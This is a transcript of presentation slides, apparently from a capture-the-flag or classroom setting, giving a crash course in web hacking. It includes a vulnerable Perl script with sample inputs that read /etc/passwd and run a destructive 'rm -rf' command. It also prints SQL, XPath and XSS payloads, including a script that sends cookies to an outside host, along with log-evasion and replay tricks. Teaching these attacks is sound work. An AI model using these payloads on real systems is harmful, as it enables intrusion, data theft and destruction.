Crash Course in Web Hacking
Post on 17-Jan-2016
53 Views
Preview:
DESCRIPTION
Transcript
Mike Gerschefske
Hacking is illegal (most of the time) Understand the laws Port Scanning can be considered
illegal Post 9/11 can be act of terrorism
DMCA Exceptions Educational Learning (Institution)
Who cares about web hacking? The days of buffer overflows and root
boxes are nearing an end… Non executing stacks People patching their systems
Everything is turning into a web system
Power of Google
Google knows all SSN/Credit Card, backend sql http://johnny.ihackstuff.com/ghdb.php
intitle:snc-rz30 inurl:home/ Robots.txt
Don’t put secrets in here
Power of the web browser
Is capable of HTTP GET/POST Capable of sending any kind of GET/POST Doesn’t have to run client side code (ie
javascript) Can send anything it wants to
Can be Bad: url: http://somesite/index.php?
section=Admin Vertical Escalation
Bad Code = Bad Security
You are not able to control client end: Cookies
Do not put User Level (admin, user, etc.) Vertical Escalation
Do not put user id Horizontal Escalation
Posts Gets Session IDs All Data
Museum Example
Code from two years ago: 1 #!/usr/bin/perl …
7 $first = param('first'); 8 $last = param('last'); 9 $password = param('password'); 10 … 25 if (($first eq "") || ($last eq "") || (! $password eq
"unbreakable")) { 26 print "<p>Could not understand or wrong password!!
</p>"; 27 } 28 else { 29 system "cat ./museum_ideas/${first}.${last}"; …
Some Good Combinations
Dump the password file:First Name: .
Last Name : /../../../../etc/passwd
Password : unbreakable
Delete the whole directory:First Name: NOTEMPTY Last Name : & rm -rf
/home/museum/public_html/cgi_bin/museum_ideas
Password : unbreakable
Command Injection
This is basic idea of command injection
Security through obscurity sometimes works
Some people are very diligent
SQL Injections
We can send commands, why not sql?
What is SQL?
What can we do with SQL? Get any data we want (that the user has
access to) Delete all the data the user has access to
If user is root, dump database If user is root, can upload and execute java/c from
database and root box
How to protect against it? Check parameters
Not really…
Need to do SQL parameterization when at all possible Mark strings as strings, ints as ints
SELECT * WHERE name = @
Why doesn’t checking params work? If you’re really smart it will, but if you
don’t understand the problem it wont This is a very difficult problem to understand
Example: http://viva/ictf/index.php/SQL_Injection
The problem is the ‘ (apostrophe) is a special character To fix we just find and replace all
apostrophe’s with two ‘’ as that’s how we insert apostrophes in a string NO!
Second Level SQL Injection The problem actually isn’t solved, just
more complicated
Take:
Username = ' OR 'a' = 'a‘
SELECT * FROM Users WHERE UserName = ''' OR ''a'' = ''a''
Goes in fine but coming out… Get username from DB and put in
var Var contains SQL We TRUST DB to give us good data Create another SQL Query and the
second one is now vulnerable
SELECT content FROM database WHERE username = VUNSQL
XSS – Cross Site Scripting Malicious injection of JavaScript Cookie Hi-jacking MySpace – Replicate itself, add friends
Samy - http://web.archive.org/web/20060208182348/namb.la/popular/tech.html
<script> document.write(“<img
src=http://site.com/a.jpg?cookie= “ + document.cookie)
</script>
Xpath Injection
//user[name/test() = ‘’ or 1=1 or ‘’ and password/text() = ‘junk’]
Used with: XML RPC SOAP/WSDL
IDS Will Find You
SQL/Command Injection is very easy to detect
IDS poor at packet fragmentation with timing attacks
Profiling
Need to know what you’re attacking Can search for exploits
HEAD / HTTP/1.0 Example Everyone’s a little different
Nmap is a good profiler Nessus will profile too
Tools
Add N Edit Cookie – Mozilla Firefox extension
Wget TamperData – FireFox Modify Headers - FireFox Curl Netcat/Telnet
Proxies Paros Proxy – Free Fiddler – Microsoft, Free Spike – Free
Timing Attacks
Breaking Authentication Username and password wrong may
take x time while username doesn’t exist takes y time
Successful timing attacks against encryption
ASP.NET Exploit
Debugging (source code) only available to localhost
Bypass this check by sending the following: GET http://localhost/bleh.asp?a=j HTTP/1.0
Check’s server name variable rather then remote address
Mod_security
http://www.modsecurity.org/
Replay Attacks
Socrebot deletes flag Scorebot adds flag
Since the scorebot goes to everyone we have the delete and add sequence
Can potentially replay same delete sequence across all enemy servers
Log Evasion
Many logs only log ~4K of URL Prevents DOS from filling up logs
If payload at the end of 4k, wont log malicious payload
http://somewhre.com/page.asp?foo=....&payload=MYPAYLOAD Application ignores foo parameter Log shows up as GET /page.asp …
Not just IIS, Sun One App Server
top related